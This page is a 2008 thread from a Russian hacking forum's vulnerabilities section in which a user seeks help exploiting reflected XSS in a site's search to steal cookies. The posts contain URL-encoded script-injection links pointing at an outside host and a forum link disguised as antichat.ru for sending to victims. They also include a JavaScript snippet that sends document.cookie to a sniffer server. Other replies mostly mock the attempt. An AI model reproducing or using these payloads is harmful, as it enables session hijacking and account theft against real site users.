ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Xss в поиске...что дальше ?
   
Ответ
Страница 3 из 3 < 1 2 3
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 10.06.2008, 19:02
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию
В общем вот что в итоге получается (сколько я не клацкал)) на интер)

Код:
http://localhost/1.php?a=search=%22%3E%3Cscript%20src=http://САЙТ.ru/js.js%3E%3C/script%3E
Получившуюся ссылку засовую в сообщение и отсылаю:
(вот эту ссылку)

PHP код:
[url=http://SITE.ru/forum/ssearch.php?q=%22%3E%3Cscript%20src=http://xxx.ru/js.js%3E%3C/script%3E]antichat.ru[/url] 
Может переадресацию нужно сделать какнить на мой js.js

Если на неё нажать,,,попадаю сюда:

PHP код:
http://site.ru/forum/ssearch.php?q=%22%3E%3Cscript%20src=http://xxx.ru/js.js%3E%3C/script%3E 
------------------------------------------------------------------------

Снифер пустой,,,,может из за кода js.js

Я в нём вот что пишу,,,но помойму не работает он вовсе)):

Код HTML:
<script>img = new Image(); img.src = "http://s.netsec.ru/login.gif?"+document.cookie;</script>
Последний раз редактировалось geforse; 10.06.2008 в 19:06..
 
Ответить с цитированием

  #22  
Старый 10.06.2008, 19:13
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию
Может вот так сделать:
Код HTML:
http://localhost/1.php?a=search="><script language="JavaScript">document.location.href=http://ххх.ru/js.js></script>

----------------------------------------------------------------------
не перенаправляет так...
Последний раз редактировалось geforse; 10.06.2008 в 19:15..
 
Ответить с цитированием

  #23  
Старый 10.06.2008, 19:23
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию
ОМФГ! Лучше просто забей на это дело
 
Ответить с цитированием

  #24  
Старый 10.06.2008, 19:25
Mo4x
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350

Репутация: 412
По умолчанию
очешь спать спокойно, лучше не начинай.
Последний раз редактировалось Mo4x; 10.06.2008 в 19:28..
 
Ответить с цитированием

  #25  
Старый 10.06.2008, 19:38
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию
Цитата:
Сообщение от diehard  
ОМФГ! Лучше просто забей на это дело
Этого я уж точно не сделаю....
Последний раз редактировалось geforse; 10.06.2008 в 19:42..
 
Ответить с цитированием

  #26  
Старый 11.06.2008, 15:50
fatalo
Участник форума
Регистрация: 15.05.2008
Сообщений: 166
Провел на форуме:
2591223

Репутация: 128
Отправить сообщение для fatalo с помощью ICQ
По умолчанию
Мб если ты не можешь простейшего(утащить куки) не стоит в это ввязыватся?(советую перечитать мануал по xss)
 
Ответить с цитированием
Ответ
Страница 3 из 3 < 1 2 3



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Юмор. Анекдоты, смешные рассказы/логи. Mobile Болталка 1356 16.06.2010 16:46
Продвижение сайтов в зарубежных поисковых системах baltazar Статьи 1 24.03.2008 03:41
Установка Windoze глазами линуксоида (100% факты) nerezus Болталка 47 16.10.2005 15:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ